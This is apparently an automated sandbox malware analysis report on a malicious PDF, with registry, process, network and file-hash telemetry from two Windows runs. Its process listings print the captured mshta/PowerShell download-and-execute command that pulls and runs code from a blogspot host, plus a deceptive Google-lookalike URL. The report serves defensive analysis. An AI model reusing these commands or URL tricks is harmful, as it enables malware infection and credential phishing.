Malware Analysis Report

2024-10-19 11:11

Sample ID 240207-sqnfysabb6
Target a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.zip
SHA256 c445c0bae9b5f72b7673419c5a0c8928350d00ab9d09fcd10f6caa6150b95e9c
Tags
pdf link javascript
score
6/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
6/10

SHA256

c445c0bae9b5f72b7673419c5a0c8928350d00ab9d09fcd10f6caa6150b95e9c

Threat Level: Shows suspicious behavior

The file a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.zip was found to show suspicious behavior.

Malicious Activity Summary

pdf link javascript

PDF contains JavaScript

Enumerates physical storage devices

One or more HTTP URLs in PDF identified

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-07 15:19

Signatures

PDF contains JavaScript

pdf javascript

One or more HTTP URLs in PDF identified

pdf link

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-07 15:19

Reported

2024-02-07 15:22

Platform

win7-20231215-en

Max time kernel

117s

Max time network

142s

Command Line

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{64E259A1-C5CC-11EE-88F9-76B33C18F4CF} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "413481084" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 2380 (x4) N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2704 (x4) N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2380 wrote to memory of 2832 (x4) N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 2952 (x4) N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" "javascript:_r°0=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;','run']; x°x=[_r°0[3],_r°0[0],_r°0[1],_r°0[2]]; new ActiveXObject(x°x[2])[x°x[0]](x°x[3], 0, true);close();new ActiveXObject(x°x[1]).DeleteFile(WScript.ScriptFullName);"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com+signin%3Dsecure+v2+identifier%[email protected]////////atom.xml?http://www.booking.com

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2704 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.bing.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp (x3)

Files

memory/2832-2-0x000000006DE40000-0x000000006E3EB000-memory.dmp

memory/2832-3-0x000000006DE40000-0x000000006E3EB000-memory.dmp

memory/2832-4-0x0000000000250000-0x0000000000290000-memory.dmp

memory/2832-5-0x0000000000250000-0x0000000000290000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabE1CA.tmp

C:\Users\Admin\AppData\Local\Temp\TarE4CA.tmp

memory/2832-83-0x000000006DE40000-0x000000006E3EB000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6f1b37e9aa88930e15b4aee3afc03f79
SHA1 be3636743e4773e342c40c2be24277b4604ce2bf
SHA256 af0d5f920aeed99be40e6d1aba6a7f7264a4a98c6f2b80d66e564453cb71185c
SHA512 4fa556f9b362947675e2dd51d59d821abbafaefbc1127fd71a3a24cea24b557ac077b00b14fc892b1303c95dc922de1edd4b48077cfc21e7f771bf744455831f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 252f5497cfeac5bbcbc4a10c17941e37
SHA1 083e43af5860bd07ab549f8bc4421cd113b82d71
SHA256 aa72b5e6d65a505be7330b3e4ac21858dc141551f374271574b4134f58c7b09a
SHA512 dcf5a00a30a23e36be639cfbd878ec0f5e53f6601ba780e7c31b68f5f3f222a1dd21d59b288a7844c4c71614cf2bb86bfd304f60e75042cd29476d9b38495aa4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c27afeb0bbae829db72ac30e5ba8d55c
SHA1 21fc03619fb367c23afd19872a25309941184035
SHA256 f7df667bad612c7ef970208e686a86939da936df336b48722d68829ffba57596
SHA512 a8ae8f1ba1140052be6817f9378d21a44cc8590e7e7172bf0da7a2d2186d47fa5c863887acad98a7e745a4c54bf60428bf299b96fd143f1f0b514ad1e0d17083

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1552a5ea0085d32ce9b633caff6ea458
SHA1 eea575081698284bb1b2967a513bfa6ce343f63b
SHA256 91ac8d23997476df5fcc982f8336e3a275ea92aaa75faa40a9732b8e8a24749c
SHA512 e1089712ca43a223e8fca7b0509c09271b2f276b24d565247dfec73f05645638002b83c03b637df63e820340cb7e92da988b8261cd66c632a3dd5838c0a03abe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ba583ef38f6baf36e9b695be5271da1e
SHA1 79539f9a46efcf3237ad1edbbdb823056910fca9
SHA256 04629e02177e94c6d94c4f81d65731259a5610cace5d89868e528f061172849b
SHA512 e4e7e77a90e34efdcebe082b12f88689fb6fd50a9365f7b873fd48924f3d73c84967f26ef15799356c7c11f112ad05ff161de805afc65bff2d18d3f1922ae61a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 32841ca4fa1bc43b9bfdea0e0a809734
SHA1 4fd0479154ecf315bbb3c4760e520336509578b0
SHA256 323eb37ef5f6141f77f8a68ea3d4aa41c51cff7650c1f16b9ce2323d852fc8a9
SHA512 c6b74f093612d10e02bf88823dd03551d8fcdb180abfebbcdd22f780fe95cd6d632dacdf9a7c5012f5dbc022c0bc4b49560bb9aaaa685bf99ba362b13a483515

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6f41fa6bf50428e27e18a4b73859d553
SHA1 5213ce7c502d6c68e058ddb820987eaa0a4ac265
SHA256 4e56456bbd1fa9389bab026236e25db2e10c59e095cd49097ac5c6cdb3d5bbb9
SHA512 ae3875aa89d1a7cd8cb91fb7b1207b6b063e8b0f7316701c684503a34ccadf8f4feb19938f4cc00505e6b03909a920b3f2949c57ea174e867d572fef6ff83d88

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6fa1e81b3de224840b5143ceeded9e90
SHA1 1c0afb63b62b8c7d3440770c90524411bc2b79e7
SHA256 03e3221be5e5b912823cb5e3cd94912f4dc710ce3fe538625b7e9eb4e494c863
SHA512 fe34c907c7596103221381880de550c624204421862abc0f53685295c10bfe017f80cc0c650f49eb83ff4b0377a94a8fdd12eec94628c0ce7fba2d7ab077233b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8f71a8d423c2947fc044cf4b4ed43f98
SHA1 eab2aab527b44e7cf2034ebda17b6fd848e6ab6b
SHA256 30ad6f585136519107bc9cccdc9d323cb103c13060d2c3534f2e0464c11aa4f5
SHA512 a74cec782b47373c42c6470b3e7b57914f66fd34e7b42b6d8d4d6dae888c7e2946a094368e51cd73e2a684e1d68c2834480604e4f8a54cfe3476c607560877b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 19039e901207bdae8e1376cfe09f645d
SHA1 3b7d6496d545018b5582c6d9254cd2f2cbb69d50
SHA256 b86036abc1cc1050b9f00e714af1f3815fdc4d4c135e084be17755ed6544d1f9
SHA512 dc0d2303de593de3e0e8c232279f9aa475c7d39a6bac1fcc698e9dd92a768ff17d63d19fdadb3d1df6ad68f7bde48078dbb576344dcdc125a9fa8823317de872

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b501d6c97d61eab195fe4b7f1dcc09f8
SHA1 c4399036054545b1383e57558579fc219eb637a3
SHA256 7f2aa8af38f5d3b02599cec5abee04e75934013e97ba933093102377a94c216b
SHA512 efa02893195637ea85581a658f21d9211bf29f737901c7cdfddf3a26f77b6b6341f6bca75184ebed3e2daad2273f94e78e412879f28d3715dccf385e1bb7da28

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5c9b1499a0a2f81923e70d1ff1b8e50c
SHA1 d2073a348bced4cf5b0a05c88ea56a57745ddabb
SHA256 0f5199d2a81ab952c75b1bb118cf60eeea68af00e21cc5bd89aa9ee0ad4088a4
SHA512 996a2efae7572ce5952b3ad8d0bf6a4af21843efaa6c92a1e74dba9aeaf0bbd8e15be3c32b6fcff86de7fe7257bfcc642e9ab0106fd3db75fb2ae1f79f520a02

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0724b11ea4746fc28a6364d09304c3fb
SHA1 117eea326a6a37ae10064591e804e629b6be8fc5
SHA256 6d10b002d09babd7bdc3281fe31367fe9f89a92078d54e3afa1105c57d332029
SHA512 2424fcf978afcfa1eab5f57a858bdd432b9492d1a76311d6080249f90b409cbcbceed0b0dc49ab0dbb6bcc1ec43b10453f9df0904451184b73155c1fd53fd7c8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e7a3f93d49007c771a34eaccac1c9a63
SHA1 82d4dd111e89a90a38ed0d4afef2968b5c3a07f6
SHA256 b873d365ab2528156e4f8232a46b9adde78d108951276b868445176f5747def1
SHA512 f3d469f829caed995832de71b76b8a398ab369f98a4351cf1058c65b9696308ce9112f6c377913f52533dff3c7659ef808fb4c252056b9239d060fe1e7f90271

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fc0b98705430d61eb6d26c306eeadcb9
SHA1 c2102f9d1606733a198b2718ae31890d1dbf6977
SHA256 dbc35cfbe4f6b68ea8544a363a86c4e22f0aad37d6f281df572378bb28ec65b6
SHA512 6ebc4fd3564236326ae2b28e2df414e178e232751022e9d4a84afd51c5a69fc53ea97bbdfc59c8ec1105884b6a6987a0ea3bd814e06dd6bc6162be601726a9b2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cc43d3ba9e35a0839c116f013b4b726e
SHA1 e0ad3f113f18c426cb9662b5b0a6c60e186a69d7
SHA256 c63609a38c78b4d1e94f462f9b1ca72d0b704655dc2850280d098eac1505c5a7
SHA512 8c9d2e0349cb64e59b19400e55b547fb1feb12f327b2a4b01395f916080b2d912e41d88357c03ec0baf6f4337d0c22d8784e044483be2be2cc46368cbefb27c8

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-07 15:19

Reported

2024-02-07 15:22

Platform

win10v2004-20231215-en

Max time kernel

146s

Max time network

154s

Command Line

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (x25)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (x24)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 980 wrote to memory of 932 (x2) N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 3356 (x2) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 (x40) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4048 (x2) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 (x15) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com+signin%3Dsecure+v2+identifier%[email protected]////////atom.xml?http://www.booking.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ffaf50546f8,0x7ffaf5054708,0x7ffaf5054718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4820 /prefetch:2

Network

Country Destination Domain Proto
